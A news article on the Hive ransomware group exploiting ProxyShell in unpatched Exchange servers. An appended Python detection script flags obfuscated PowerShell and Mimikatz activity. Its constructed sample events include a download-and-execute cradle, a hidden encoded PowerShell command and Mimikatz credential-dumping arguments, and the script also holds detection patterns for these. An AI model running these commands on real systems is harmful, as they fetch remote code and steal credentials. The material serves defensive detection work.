Since June 2021, the Hive threat group has targeted organizations in the financial, energy and healthcare sectors as part of coordinated ransomware attacks.
During the attacks, the group exploits the ProxyShell vulnerabilities in Microsoft Exchange servers to remotely execute arbitrary commands and then encrypts corporate data with its own Hive ransomware strain.
The group is highly organized: Varonis’ research team recently found that a threat actor managed to penetrate an organization’s environment and encrypt the target data with the ransomware strain in less than 72 hours.
These attacks are of particular concern because unpatched Exchange servers can be publicly discovered through web crawlers. “Anyone with an unpatched Exchange server is at risk,” said Gartner analyst Peter Firstbrook.
“Even organizations that have migrated to the cloud version of Exchange often still have some on-premises Exchange servers that can be exploited if they are not patched. Threats are already circulating and unpatched servers can be detected with a web crawler, so it is very likely that unpatched servers will be exploited,” Firstbrook said.
How much risk does ProxyShell entail?
Despite the severity of these vulnerabilities, many organizations have failed to patch their on-premises Exchange servers (the vulnerabilities do not affect Exchange Online or Office 365).
Last year, Mandiant reported that about 30,000 Exchange Servers remain unpatched, and recent attacks show that many organizations are slow to update their systems.
This is problematic because the vulnerabilities allow an attacker to remotely execute arbitrary commands and malicious code on the Microsoft Exchange server over port 443.
“Attackers continue to exploit the ProxyShell vulnerabilities that were initially revealed more than eight months ago. They have proven to be a reliable source for attackers since their disclosure, despite patches being available,” said Claire Tills, Senior Research Engineer at Tenable.
“The latest attacks by an affiliate of the Hive ransomware group are made possible by the ubiquity of Microsoft Exchange and apparent delays in patching these months-old vulnerabilities. Organizations around the world in diverse industries use Microsoft Exchange for critical business functions, making it an ideal target for threat actors.”
Tills suggests that organizations that fail to patch their Exchange servers allow attackers to skip much of the reconnaissance and preliminary steps they would otherwise need to infiltrate target systems.
Detect ProxyShell Intrusions
Organizations that are slow to patch, such as less mature or understaffed IT organizations, may fall into the trap of thinking that, because there are no obvious signs of intrusion, no one has used ProxyShell to gain a foothold in their environment, but this isn’t always the case.
Firstbrook notes that while “ransomware attacks will be obvious to organizations when they happen, there are a host of other attack techniques that [are] a lot stealthier, so the absence of ransomware doesn’t mean the Exchange server isn’t already compromised.”
It is for this reason that Brian Donohue, Principal Information Security Specialist at Managed Detection and Response (MDR) provider Red Canary, recommends that organizations ensure that they can detect Cobalt Strike or Mimikatz execution even if they cannot update Exchange.
“Broad defense and defense in depth against a wide variety of threats means that even if you can’t patch your Exchange servers or the adversary uses completely new tradecraft in certain parts of the attack, you can still catch Mimikatz activity, or you would have an alert looking for the heavily obfuscated PowerShell used by Cobalt Strike — all of that happening before anything gets encrypted,” Donohue said.
In other words, companies that haven’t patched the vulnerabilities can still protect themselves by using Managed Detection and Response and other security solutions to detect malicious activity preceding ransomware encryption so they can respond before it’s too late.
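The detection idea described above, as an added example that is not part of the original article or any vendor's product: a small triage pass over constructed Windows process-creation events that flags the pre-encryption activity Donohue names, heavily obfuscated PowerShell, Mimikatz-style command lines, and shells spawned by the Exchange IIS worker process (w3wp.exe, the process that ProxyShell command execution would run under). The indicator names, weights and the threshold of 4 are assumptions chosen for this illustration, and the sample events are constructed.

```python
import base64
import binascii
import math
import re
from typing import List, Optional, Tuple

# Constructed script used only to build a realistic-looking -EncodedCommand sample.
SAMPLE_SCRIPT = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a")'
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed sample events: (parent image, image, command line).
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe", r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"),
    ("w3wp.exe", "powershell.exe", f"powershell.exe -nop -w hidden -ep bypass -enc {SAMPLE_B64}"),
    ("cmd.exe", "svchost.exe", 'svchost.exe "privilege::debug" "sekurlsa::logonpasswords" exit'),
    ("services.exe", "cmd.exe", "cmd.exe /c schtasks /query /fo LIST"),
]

# PowerShell accepts abbreviated switches, so match the short forms too.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
FLAG_RES = {
    "noprofile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-e(?:p|xec|xecutionpolicy)\s+bypass", re.I),
}
CRADLE_RE = re.compile(r"\biex\b|invoke-expression|downloadstring|frombase64string|net\.webclient", re.I)
CHARCODE_RE = re.compile(r"\[char\]\s*\d+", re.I)
MIMIKATZ_TOKENS = ("sekurlsa::", "privilege::debug", "lsadump::", "kerberos::")
EXCHANGE_WORKER = "w3wp.exe"
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")
PS_THRESHOLD = 4  # assumed: score at or above this is "heavily obfuscated"


def shannon_entropy(text: str) -> float:
    """Bits per character; long, high-entropy inline scripts are a classic obfuscation tell."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (PowerShell uses UTF-16LE) or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except binascii.Error:
        return None
    return raw.decode("utf-16-le", errors="replace")


def score_powershell(cmdline: str) -> Tuple[int, List[str]]:
    """Additive obfuscation score with the reasons that fired (weights are assumptions)."""
    score, reasons = 0, []
    for name, rx in FLAG_RES.items():
        if rx.search(cmdline):
            score, reasons = score + 1, reasons + [name]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        score, reasons = score + 2, reasons + ["encoded_command"]
        if CRADLE_RE.search(decoded):
            score, reasons = score + 2, reasons + ["download_cradle_in_decoded"]
    # Strip the base64 blob before the plaintext checks so its '+' characters do not count.
    stripped = ENC_RE.sub("-enc <blob>", cmdline)
    if len(CHARCODE_RE.findall(stripped)) >= 3:
        score, reasons = score + 2, reasons + ["charcode_obfuscation"]
    if stripped.count("`") > 5 or stripped.count("+") > 8:
        score, reasons = score + 2, reasons + ["heavy_concatenation"]
    if len(stripped) > 200 and shannon_entropy(stripped) > 4.5:
        score, reasons = score + 1, reasons + ["high_entropy"]
    if CRADLE_RE.search(stripped):
        score, reasons = score + 1, reasons + ["download_cradle_inline"]
    return score, reasons


def classify_event(parent: str, image: str, cmdline: str) -> List[str]:
    """Findings for one process-creation event; an empty list means nothing fired."""
    findings = []
    if image.lower() in ("powershell.exe", "pwsh.exe"):
        score, _ = score_powershell(cmdline)
        if score >= PS_THRESHOLD:
            findings.append("obfuscated_powershell")
    low = cmdline.lower()
    if any(tok in low for tok in MIMIKATZ_TOKENS):
        findings.append("mimikatz_commandline")
    if parent.lower() == EXCHANGE_WORKER and image.lower() in SHELLS:
        findings.append("exchange_worker_spawned_shell")
    return findings


def triage(events) -> List[Tuple[str, str, List[str]]]:
    """Keep only events with at least one finding: (parent, image, findings)."""
    out = []
    for parent, image, cmd in events:
        findings = classify_event(parent, image, cmd)
        if findings:
            out.append((parent, image, findings))
    return out


if __name__ == "__main__":
    for parent, image, findings in triage(SAMPLE_EVENTS):
        print(f"{parent} -> {image}: {', '.join(findings)}")
```

On the constructed events the backup script scores 1 (only -NoProfile) and is ignored, the encoded command under w3wp.exe scores 7 and also trips the parent-process rule, and the renamed binary is caught purely on its command-line tokens. The point is the one Donohue makes: none of these checks depend on knowing the Exchange entry point, so they still fire when patching lags or the initial access technique is new. A production rule would feed Sysmon or EDR process telemetry into the same functions and tune the weights against its own baseline.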
This post, “Experts warn Hive ransomware gang can detect unpatched servers with web crawler”, was originally published at https://venturebeat.com/2022/04/25/experts-warn-that-hive-ransomware-attackers-can-detect-unpatched-servers/